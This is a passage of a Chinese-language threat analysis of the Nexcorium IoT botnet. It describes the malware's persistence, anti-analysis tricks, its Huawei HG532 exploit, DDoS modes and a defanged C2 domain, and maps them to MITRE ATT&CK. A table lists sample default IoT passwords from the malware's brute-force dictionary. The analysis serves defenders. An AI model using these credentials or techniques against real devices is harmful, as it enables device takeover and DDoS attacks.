1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">添加周期性计划任务，每隔固定时间间隔重新执行恶意进程，作为前三层持久化的冗余备份。</span></p><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">自防御与反分析能力</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Nexcorium集成了多种反检测机制：</span></p><ul style="list-style-type: circle;" class="list-paddingleft-1"><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">自删除功能</span><span textstyle="" style="font-size: 16px;">：初始感染完成后，删除原始二进制文件，增加取证难度</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">完整性自检</span><span textstyle="" style="font-size: 16px;">：运行时验证自身文件哈希，防止被替换或篡改</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">环境检测</span><span textstyle="" style="font-size: 16px;font-weight: normal;">：</span><span textstyle="" style="font-size: 16px;">识别虚拟化环境和沙箱工具特征，规避自动化分析</span></span></strong></p></li></ul></ul><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">横向扩展攻击链</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">恶意软件内置两套横向扩展机制：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">嵌入式漏洞利用</span></strong><span leaf="">：集成针对</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">华为HG532路由器</span></strong><span leaf="">的CVE-2017-17215漏洞利用代码。攻击者无需依赖外部漏洞库，即可直接对特定目标发起攻击。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">暴力破解字典</span></strong><span leaf="">：内置超过50个默认凭据，覆盖常见物联网设备厂商的出厂设置密码。字典内容包括：</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">类别</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">示例凭据</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">简单数字序列</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">12345, 123456, 888888</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">管理员默认账户</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">admin, Administrator, root</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">厂商默认密码</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">hikvision, D-Link, Zte521</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">复合型弱密码</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">7ujMko0admin, OxhlwSG8, taZz@23495859</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">攻击者利用该字典对同网段物联网设备进行持续的Telnet暴力破解尝试。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">DDoS攻击能力评估</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">Nexcorium的最终目的为组建大规模物联网僵尸网络，用于发动分布式拒绝服务攻击。攻击模块支持以下DDoS攻击方式：</span></p><ul style="list-style-type: circle;" class="list-paddingleft-1"><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">UDP Flood</span><span textstyle="" style="font-size: 16px;">：向目标发送大量UDP数据包，耗尽带宽资源</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">TCP SYN Flood</span><span textstyle="" style="font-size: 16px;">：发送大量半开TCP连接请求，耗尽连接队列</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">TCP ACK Flood</span><span textstyle="" style="font-size: 16px;">：发送大量带确认标志的TCP数据包</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">SMTP Flood</span><span textstyle="" style="font-size: 16px;">：针对邮件服务器的连接耗尽攻击</span></span></strong></p></li></ul><ul style="list-style-type:disc;" class="list-paddingleft-1"><li><p><strong><span leaf="" style="color:rgba(0, 0, 0, 0.9);font-size:17px;font-family:&#34;mp-quote&#34;, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height:1.6;letter-spacing:0.034em;font-style:normal;font-weight:normal;"><span textstyle="" style="font-size: 16px;font-weight: bold;">其他变种攻击</span><span textstyle="" style="font-size: 16px;">：包括HTTP Flood、DNS Amplification等技术变体</span></span></strong></p></li></ul></ul><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">C2服务器域名为</span><strong style="overflow-wrap: break-word;font-weight: bold;font-size: inherit;"><span leaf="">r3brqw3d[.]b0ats[.]top</span></strong><span leaf="">，攻击者通过该域名向受控设备下发攻击指令和目标列表。</span></p><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">MITRE ATT&amp;CK技术映射</span></h2><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术编号</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">技术名称</span></p></th><th style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">攻击阶段</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1059.004</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Unix Shell</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">命令与控制</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1053.003</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Cron计划任务</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">持久化</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1543.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">创建/修改系统进程</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">持久化</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1547.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">启动项持久化</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">持久化</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1070.004</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">文件删除</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">防御规避</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1071.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">应用层协议</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">命令与控制</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1498.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">网络洪水DDoS</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">影响</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1110.001</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">暴力破解</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">横向移动</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">T1190</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">利用公开应用漏洞</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">初始访问</span></p></td></tr></tbody></table><h2 style="overflow-wrap: break-word;padding-left: 8px;border-left: 3px solid rgb(49, 94, 163);margin: 1em 8px 0.95em 0px;color: rgb(55, 113, 187);font-size: 19.2px;font-weight: bold;line-height: 1.2;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">国内影响面评估</span></h2><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">结合国内物联网安全现状：</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">受影响设备范围</span>：TBK DVR设备在国内视频监控市场占有一定份额，主要应用于中小型企业、商业场所和住宅小区。考虑到相关固件更新渠道有限，设备可能仍在使用存在漏洞的旧版本固件。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">关联漏洞活跃度</span>：CVE-2024-3721与此前披露的CVE-2017-17215（华为HG532）、CVE-2023-33538（TP-Link多型号路由器）等漏洞形成序列，表明针对物联网设备的漏洞利用已呈现工具化、自动化特征。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 